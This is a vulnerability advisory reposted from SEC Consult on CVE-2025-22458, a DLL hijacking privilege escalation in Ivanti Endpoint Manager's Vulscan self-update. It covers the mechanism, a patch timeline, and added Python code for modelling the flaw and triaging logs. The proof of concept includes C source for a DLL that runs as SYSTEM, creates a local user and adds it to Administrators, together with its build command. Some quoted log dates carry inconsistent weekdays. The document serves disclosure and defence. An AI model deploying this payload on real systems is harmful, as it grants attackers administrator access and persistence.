Ivanti Endpoint Manager DLL Hijacking / Privilege Escalation

19 May 2025 00:00:00
Reported by: Paul Serban
Type: packetstorm
Source: packetstorm.news
Local privilege escalation via DLL search order hijacking in Ivanti Endpoint Manager Vulscan Self Update; patch released.

Related

Family          Title                                                                          Published          Source
ATTACKERKB      CVE-2025-22458                                                                 8 Apr 2025 15:15   attackerkb
Circl           CVE-2025-22458                                                                 10 Apr 2025 20:47  circl
CNNVD           Ivanti Endpoint Manager Code Issue Vulnerability (title translated from Chinese)  8 Apr 2025 00:00   cnnvd
CNVD            Ivanti Endpoint Manager Code Issue Vulnerability                               18 Apr 2025 00:00  cnvd
CVE             CVE-2025-22458                                                                 8 Apr 2025 14:25   cve
Cvelist         CVE-2025-22458                                                                 8 Apr 2025 14:25   cvelist
EUVD            EUVD-2025-10296                                                                3 Oct 2025 20:07   euvd
Ivanti          Security Advisory April 2025 for Ivanti EPM 2024 and EPM 2022 SU6              8 Apr 2025 14:01   ivanti
Tenable Nessus  Ivanti Endpoint Manager < 2022 SU7 / 2024 < 2024 April 2025 Security Update    11 Apr 2025 00:00  nessus
NCSC            Vulnerabilities fixed in Ivanti Endpoint Manager                               9 Apr 2025 14:41   ncsc
SEC Consult Vulnerability Lab Security Advisory < 20250422-0 >
    =======================================================================
                  title: Local Privilege Escalation via DLL Search Order Hijacking
                product: Ivanti Endpoint Manager Security Scan (Vulscan) Self Update
     vulnerable version: EPM 2022 SU6 and previous, EPM 2024
          fixed version: EPM 2022 SU7 and EPM 2024 SU1
             CVE number: CVE-2025-22458
                 impact: High
               homepage: https://www.ivanti.com/
                  found: 2025-02-07
                     by: Paul Serban (Eviden)
                         SEC Consult Vulnerability Lab
    
                         An integrated part of SEC Consult, an Eviden business
                         Europe | Asia
    
                         https://www.sec-consult.com
    
    =======================================================================
    
    Vendor description:
    -------------------
    "EPM Patch and Compliance Manager uses an auto update feature in order to make
    sure that all vulnerability scanning files are up to date with the core server.
    This ensures compatibility between the files and the latest definitions as well
    as compatibility with the files on the core.  The Security Scan (Vulscan) is
    what does the update."
    
    Source: 
    https://forums.ivanti.com/s/article/About-Patch-Manager-Self-Update?language=en_US
    
    
    Business recommendation:
    ------------------------
    The vendor provides a patch which should be installed immediately.
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) DLL Search Order Hijacking (CVE-2025-22458)
    The EPM Security Scan (Vulscan) Self Update is vulnerable to DLL hijacking.
    When the agent is installed on a client machine it creates, by default, a
    scheduled task that runs as SYSTEM. Each run looks for a set of ZIP archives
    in C:\ProgramData\vulScan, a directory any authenticated user can write to,
    and those archives do not exist by default. A low-privileged user can plant
    an archive containing a DLL with the expected name; vulscan.exe extracts it
    into Program Files (x86) and loads it, so the attacker's code runs as SYSTEM.
    Because the scheduled task recurs, the planted DLL also provides persistence.
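    To make the mechanism concrete, the following Python model (an added
    example, not Ivanti's code and not part of the advisory) reproduces the
    apply loop as the vulscan.log excerpt in the proof of concept below
    describes it: any archive present in the user-writable staging directory
    is extracted into the install directory and the DLL of the same base name
    is loaded. Beside it is a fail-closed variant that applies an archive only
    if the core server has published it with a matching SHA-256 and every
    member resolves inside the install directory. The directory layout, the
    manifest format ({archive name: sha256}), the stand-in DLL bytes and the
    demo() helper are assumptions for the example; the DLL loader is a
    callback because the point is the decision, not the load.

```python
"""Model of the Vulscan self-update apply loop as the advisory's log describes
it, next to a fail-closed variant. Added illustration, not Ivanti's code:
directory layout, manifest format and demo() are assumptions for the example."""
import hashlib
import tempfile
import zipfile
from pathlib import Path

# Applier names taken from the vulscan.log excerpt in the advisory.
APPLIERS = [
    "RebootBehavior_Apply",
    "AlertSettingsBehavior_Apply",
    "InventorySettingsBehavior_Apply",
    "ClientConnectivityBehavior_Apply",
    "PortalManagerBehavior_Apply",
]


class UntrustedUpdate(Exception):
    """Raised when a staged archive cannot be tied to the core server."""


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def apply_vulnerable(staging: Path, install: Path, load_dll) -> list:
    """The logged sequence: an archive present in the (world-writable) staging
    dir is extracted into the install dir and <name>.dll is loaded from there.
    Nothing ties the archive to what the core server published."""
    loaded = []
    for name in APPLIERS:
        archive = staging / f"{name}.zip"
        if archive.exists():                      # "Checking whether to unzip"
            with zipfile.ZipFile(archive) as zf:  # "Unzip ... to directory"
                zf.extractall(install)
        dll = install / f"{name}.dll"
        if dll.exists():                          # "Loading applier dll"
            load_dll(dll)
            loaded.append(dll)
    return loaded


def apply_fail_closed(staging: Path, install: Path, load_dll,
                      core_manifest: dict) -> list:
    """Same loop, but an archive is applied only if the core's manifest
    (assumed format: {archive file name: sha256 hex}) lists it with a
    matching digest and every member resolves inside the install dir.
    An archive the core never published is an error, not 'up to date'."""
    loaded = []
    root = install.resolve()
    for name in APPLIERS:
        archive = staging / f"{name}.zip"
        if archive.exists():
            expected = core_manifest.get(archive.name)
            if expected is None:
                raise UntrustedUpdate(f"{archive.name}: not published by core")
            if sha256_file(archive) != expected:
                raise UntrustedUpdate(f"{archive.name}: digest mismatch")
            with zipfile.ZipFile(archive) as zf:
                for member in zf.namelist():
                    if root not in (root / member).resolve().parents:
                        raise UntrustedUpdate(f"{archive.name}: {member} escapes install dir")
                zf.extractall(root)
        dll = install / f"{name}.dll"
        if dll.exists():
            load_dll(dll)
            loaded.append(dll)
    return loaded


def demo(base=None) -> dict:
    """Plants an attacker-style RebootBehavior_Apply.zip (constructed here; the
    member is a stand-in for a DLL) and runs both variants against it."""
    base = base or Path(tempfile.mkdtemp())
    staging = base / "ProgramData" / "vulScan"
    install = base / "Program Files (x86)" / "LANDesk" / "LDClient"
    staging.mkdir(parents=True, exist_ok=True)
    install.mkdir(parents=True, exist_ok=True)
    planted = staging / "RebootBehavior_Apply.zip"
    with zipfile.ZipFile(planted, "w") as zf:
        zf.writestr("RebootBehavior_Apply.dll", b"MZ stand-in for the PoC DLL")
    noop = lambda p: None  # stands in for LoadLibrary

    results = {}
    results["vulnerable"] = [p.name for p in apply_vulnerable(staging, install, noop)]
    (install / "RebootBehavior_Apply.dll").unlink()   # reset for the next runs

    try:
        apply_fail_closed(staging, install, noop, core_manifest={})
        results["unlisted"] = "accepted"
    except UntrustedUpdate as err:
        results["unlisted"] = str(err)

    try:
        apply_fail_closed(staging, install, noop, core_manifest={planted.name: "0" * 64})
        results["tampered"] = "accepted"
    except UntrustedUpdate as err:
        results["tampered"] = str(err)

    genuine = {planted.name: sha256_file(planted)}
    results["listed"] = [p.name for p in apply_fail_closed(staging, install, noop, genuine)]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:10} {value}")
```

    The vulnerable loop accepts the planted archive; the fail-closed loop
    rejects it when the core has no record of it or the digest differs, and
    applies it only when the manifest matches. A real fix would go further:
    verify the extracted DLL's Authenticode signature before LoadLibrary, and
    stop staging through a directory every authenticated user can write to.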
    
    
    Proof of concept:
    -----------------
    1) DLL Search Order Hijacking (CVE-2025-22458)
    In the screenshot below, the scheduled task "LANDESK Agent Health Bootstrap
    Task" can be seen running as SYSTEM on the client machine.
    
    <01_scheduled_task_as_system.png>
    
    By default it is set to run daily at 9 PM.
    
    <02_scheduled_task_recurrence.png>
    
    This scheduled task runs the vulscan.exe binary that scans to make sure
    that all vulnerability scanning files are up to date with the core Ivanti
    server.
    
    <03_scheduled_task_command.png>
    
    Every scan run by this agent saves a log in the following location:
    
    C:\ProgramData\LANDesk\Log\vulscan.log
    
    The ProgramData folder allows any authenticated user to read and write
    into it. While reading the log, the following lines indicate that some
    files are not found.
    
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file RebootBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file AlertSettingsBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file InventorySettingsBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file ClientConnectivityBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file PortalManagerBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    <snipped for brevity>
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find "C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find "C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find "C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find "C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find "C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 Self update: files are up to date.
    
    The scan is looking for a set of ZIP archives. It first asks the core
    Ivanti server for them, then looks in the ProgramData folder. Since it
    finds them in neither location, it concludes that it is up to date.

    Further down in the log it can be seen that the scan tries to unzip the
    same archives from the ProgramData folder. It cannot find them and then
    loads DLL files from Program Files (x86) whose base name matches the
    archive name.
    
    Thu, 10 Feb 2025 21:00:20 Checking whether to unzip 'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'.  Force: true
    Thu, 10 Feb 2025 21:00:20 GetFileHash: could not find "C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:20 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
    Thu, 10 Feb 2025 21:00:20 Check last error after load library.  Error: 126
    Tue, 10 Feb 2025 21:00:36 Checking whether to unzip 'C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip'.  Force: false
    Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find "C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
    Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:36 'PreApplyBehavior' is not in 'C:\Program Files (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:36 Calling 'ApplyBehavior' in 'C:\Program Files (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:36 Checking whether to unzip 'C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip'.  Force: false
    Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find "C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip"
    Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:37 'PreApplyBehavior' is not in 'C:\Program Files (x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:37 Calling 'ApplyBehavior' in 'C:\Program Files (x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:38 Checking whether to unzip 'C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip'.  Force: false
    Tue, 10 Feb 2025 21:00:38 GetFileHash: could not find "C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip"
    Tue, 10 Feb 2025 21:00:38 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\ClientConnectivityBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:38 Calling 'PreApplyBehavior' in 'C:\Program Files (x86)\LANDesk\LDClient\ClientConnectivityBehavior_Apply.dll'
    <snipped for brevity>
    Wed, 10 Feb 2025 21:01:42 Checking whether to unzip 'C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip'.  Force: false
    Wed, 10 Feb 2025 21:01:42 GetFileHash: could not find "C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip"
    Wed, 10 Feb 2025 21:01:42 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
    Wed, 10 Feb 2025 21:01:44 'PreApplyBehavior' is not in 'C:\Program Files (x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
    Wed, 10 Feb 2025 21:01:44 Calling 'ApplyBehavior' in 'C:\Program Files (x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
    
    The Program Files (x86) folder already contains all the DLL files it looks
    for, with one exception: it does not contain RebootBehavior_Apply.dll.
    
    <04_rebootdll_missing.png>
    
    Because the zip files in question don't exist in ProgramData, a low privileged
    user can create them.
    
    <05_maliciousZIP_lowprivuser.png>
    
    The RebootBehavior_Apply.zip file could, for example, contain a
    RebootBehavior_Apply.dll that, when loaded, creates a new user and adds it
    to the local administrators group. This archive name was chosen because it
    is the first one the scan searches for, but any of the others can be used.
    The DLL will still be created; the only difference is that a second scan
    is required before the run reaches the stage where it tries to load
    RebootBehavior_Apply.dll again.
    
    #include <windows.h>
    #include <stdlib.h>
    #include <stdio.h>

    /* Payload. vulscan.exe is started by the scheduled task, so this runs as
       SYSTEM: create a local user and add it to the Administrators group.
       Declared as a thread start routine so CreateThread gets the signature
       it expects. */
    static DWORD WINAPI Entry(LPVOID lpParam) {
        (void)lpParam;
        system("cmd.exe /C net user secconsult P@ssW0rd1sSup3rS6curE /add /Y");
        system("cmd.exe /C net localgroup administrators secconsult /add");
        return 0;
    }

    /* Export that vulscan.exe looks up by name after loading an applier DLL. */
    __declspec(dllexport) void PreApplyBehavior(void) {
        Entry(NULL);
    }

    /* Also fire from DllMain so the payload runs on load alone. The work is
       moved to a new thread rather than done under the loader lock. */
    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call,
                          LPVOID lpReserved) {
        (void)hModule;
        (void)lpReserved;
        switch (ul_reason_for_call) {
            case DLL_PROCESS_ATTACH:
                CreateThread(NULL, 0, Entry, NULL, 0, NULL);
                break;
            case DLL_THREAD_ATTACH:
            case DLL_THREAD_DETACH:
            case DLL_PROCESS_DETACH:
                break;
        }
        return TRUE;
    }
    
    
    Notice the "PreApplyBehavior" export, which just runs the malicious
    commands. vulscan.exe looks this function up by name after loading an
    applier DLL; the log above shows it calling 'ApplyBehavior' instead when the
    export is absent. The DLL was built as a 32-bit image, matching the
    vulscan.exe host installed under Program Files (x86), with the command below.
    
    i686-w64-mingw32-gcc poc.c -shared -o RebootBehavior_Apply.dll
    
    When the scheduled task runs, it finds the malicious ZIP file, unzips it
    into 'C:\Program Files (x86)\LANDesk\LDClient\' and immediately loads the
    extracted DLL.
    
    Tue, 11 Feb 2025 21:02:52 Checking whether to unzip 'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'.  Force: false
    Tue, 11 Feb 2025 21:02:52 Unzipping
    Tue, 11 Feb 2025 21:02:52 Unzip 'C:\ProgramData\vulScan\RebootBehavior_Apply.zip' to directory 'C:\Program Files (x86)\LANDesk\LDClient\'
    Tue, 11 Feb 2025 21:03:03 Successfully unzipped
    Tue, 11 Feb 2025 21:03:03 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
    Tue, 11 Feb 2025 21:03:03 Calling 'PreApplyBehavior' in 'C:\Program Files (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
    
    The malicious DLL file was created as SYSTEM:
    
    <06_maliciousDLL_created_as_SYSTEM.png>
    
    Checking the local users, it is confirmed that the new secconsult local
    administrator has been created.
    
    <07_secconsult_user_created.png>
    
    As long as the malicious RebootBehavior_Apply.dll exists in
    'C:\Program Files (x86)\LANDesk\LDClient\', the scheduled task will try to
    load it each time thus giving an attacker a stealthy persistence mechanism.
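    For defenders, here is a triage script for vulscan.log (an added example,
    not from the advisory or Ivanti) that flags the three observable stages of
    the sequence above: an applier DLL missing from LDClient (LoadLibrary
    error 126, an open hijack slot), an archive from the user-writable
    C:\ProgramData\vulScan being extracted into
    C:\Program Files (x86)\LANDesk\LDClient\, and that DLL being loaded right
    afterwards. The two sample logs are constructed from the lines quoted
    above, unwrapped to one line per entry; the severities and message wording
    are this example's own.

```python
"""Triage of vulscan.log for the staging-to-install pattern in the advisory.
Added detection example, not from the advisory or Ivanti. SAMPLE_LOG and
BENIGN_LOG are constructed from the log lines the advisory quotes."""
import ntpath
import re
from dataclasses import dataclass

# Paths named in the advisory. The staging dir is untrusted because any
# authenticated user can write to it. Matching is case-insensitive like NTFS.
STAGING_DIR = "c:\\programdata\\vulscan\\"
INSTALL_DIR = "c:\\program files (x86)\\landesk\\ldclient\\"

LINE = re.compile(r"^(?P<ts>\w{3}, \d{2} \w{3} \d{4} \d{2}:\d{2}:\d{2}) (?P<msg>.*)$")
UNZIP = re.compile(r"^Unzip '(?P<zip>[^']+)' to directory '(?P<dir>[^']+)'")
LOAD = re.compile(r"^Loading applier dll: '(?P<dll>[^']+)'")
LOAD_ERR = re.compile(r"^Check last error after load library\.\s+Error: (?P<code>\d+)")


@dataclass
class Finding:
    severity: str   # low: hijack slot open; medium: staged archive applied; high: both
    ts: str
    detail: str


def triage(log_text: str) -> list:
    """Walks the log in order and returns findings. State carried between
    lines: DLL names just extracted from the staging dir, and the target of
    the most recent LoadLibrary call."""
    findings = []
    staged = {}        # lower-case dll name -> timestamp of extraction
    last_load = None   # (dll name as logged, timestamp)
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, msg = m.group("ts"), m.group("msg")
        if (u := UNZIP.match(msg)):
            src, dst = u.group("zip"), u.group("dir")
            if src.lower().startswith(STAGING_DIR) and dst.lower().startswith(INSTALL_DIR):
                dll = ntpath.splitext(ntpath.basename(src))[0] + ".dll"
                staged[dll.lower()] = ts
                findings.append(Finding("medium", ts,
                    f"{ntpath.basename(src)} from user-writable {STAGING_DIR} "
                    f"extracted into {dst}"))
        elif (ld := LOAD.match(msg)):
            dll = ntpath.basename(ld.group("dll"))
            last_load = (dll, ts)
            if dll.lower() in staged:
                findings.append(Finding("high", ts,
                    f"{dll} loaded after being extracted from staging at "
                    f"{staged[dll.lower()]}: matches CVE-2025-22458 exploitation"))
        elif (e := LOAD_ERR.match(msg)) and e.group("code") == "126" and last_load:
            # ERROR_MOD_NOT_FOUND: the applier DLL is absent from LDClient, so a
            # staged ZIP of that name would be accepted on the next run.
            findings.append(Finding("low", ts,
                f"{last_load[0]} missing from install dir (LoadLibrary error 126): "
                "open hijack slot"))
    return findings


# Constructed from the advisory's excerpts: an open slot on day one, then the
# planted archive being applied on the next scheduled run.
SAMPLE_LOG = r"""
Thu, 10 Feb 2025 21:00:20 Checking whether to unzip 'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'.  Force: true
Thu, 10 Feb 2025 21:00:20 GetFileHash: could not find "C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:20 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
Thu, 10 Feb 2025 21:00:20 Check last error after load library.  Error: 126
Tue, 11 Feb 2025 21:02:52 Checking whether to unzip 'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'.  Force: false
Tue, 11 Feb 2025 21:02:52 Unzipping
Tue, 11 Feb 2025 21:02:52 Unzip 'C:\ProgramData\vulScan\RebootBehavior_Apply.zip' to directory 'C:\Program Files (x86)\LANDesk\LDClient\'
Tue, 11 Feb 2025 21:03:03 Successfully unzipped
Tue, 11 Feb 2025 21:03:03 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
Tue, 11 Feb 2025 21:03:03 Calling 'PreApplyBehavior' in 'C:\Program Files (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
"""

# Constructed from the advisory's excerpt of a normal run: the DLL already
# ships in LDClient and nothing is unzipped, so no finding is expected.
BENIGN_LOG = r"""
Tue, 10 Feb 2025 21:00:36 Checking whether to unzip 'C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip'.  Force: false
Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find "C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:36 'PreApplyBehavior' is not in 'C:\Program Files (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:36 Calling 'ApplyBehavior' in 'C:\Program Files (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.severity:6}] {f.ts}  {f.detail}")
    print("benign findings:", triage(BENIGN_LOG))
```

    One caveat: vulscan.log itself sits under ProgramData, which the advisory
    notes any authenticated user can write to, so an attacker can edit or
    truncate it. Treat these findings as leads and corroborate them with
    telemetry the low-privileged user cannot alter: Sysmon image-load events
    (Event ID 7) for vulscan.exe loading an unsigned DLL from LDClient,
    file-create events (Event ID 11) under C:\ProgramData\vulScan, and the
    presence of RebootBehavior_Apply.dll in LDClient, which the advisory says
    does not exist on a default install.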
    
    
    Vulnerable / tested versions:
    -----------------------------
    The following version was tested, which was the latest version available
    at the time of the test:
    * 11.0.5.2795

    Affected versions as indicated by the vendor are EPM 2024 and EPM 2022 SU6
    and all its previous versions.
    
    Vendor contact timeline:
    ------------------------
    2025-02-13: Contacting vendor via email.
    2025-02-18: Vendor confirmed that advisory was received.
    2025-02-19: Acknowledged the vendor response.
    2025-03-04: Asking for a status update.
    2025-03-04: Ivanti is working on a fix and testing it already, but will
                not make it as part of March Patch Tuesday.
    2025-03-24: Ivanti has developed a fix and plans to release it as part of
                April Patch Tuesday disclosures (4/8/25).
    2025-04-08: Vendor publishes security advisory
    2025-04-22: Coordinated disclosure of security advisory
    
    
    Solution:
    ---------
    The vendor provides a patch which can be downloaded from the following URL: 
    https://portal.ivanti.com.
    Vendor Advisory: 
    https://forums.ivanti.com/s/article/Security-Advisory-EPM-April-2025-for-EPM-2024-and-EPM-2022-SU6?language=en_US
    
    
    Workaround:
    -----------
    None
    
    
    Advisory URL:
    -------------
    https://sec-consult.com/vulnerability-lab/
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Eviden business
    Europe | Asia
    
    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
    Eviden business. It ensures the continued knowledge gain of SEC Consult in the
    field of network and application security to stay ahead of the attacker. The
    SEC Consult Vulnerability Lab supports high-quality penetration testing and
    the evaluation of new offensive and defensive technologies for our customers.
    Hence our customers obtain the most current information about vulnerabilities
    and valid recommendation about the risk profile of new technologies.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://sec-consult.com/career/
    
    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://sec-consult.com/contact/
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Mail: security-research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: https://blog.sec-consult.com
    X: https://x.com/sec_consult
    
    EOF Paul Serban / @2025


19 May 2025 00:00

Vulners AI Score: 7.6 (High risk)
CVSS 3.1: 7.8
EPSS: 0.00159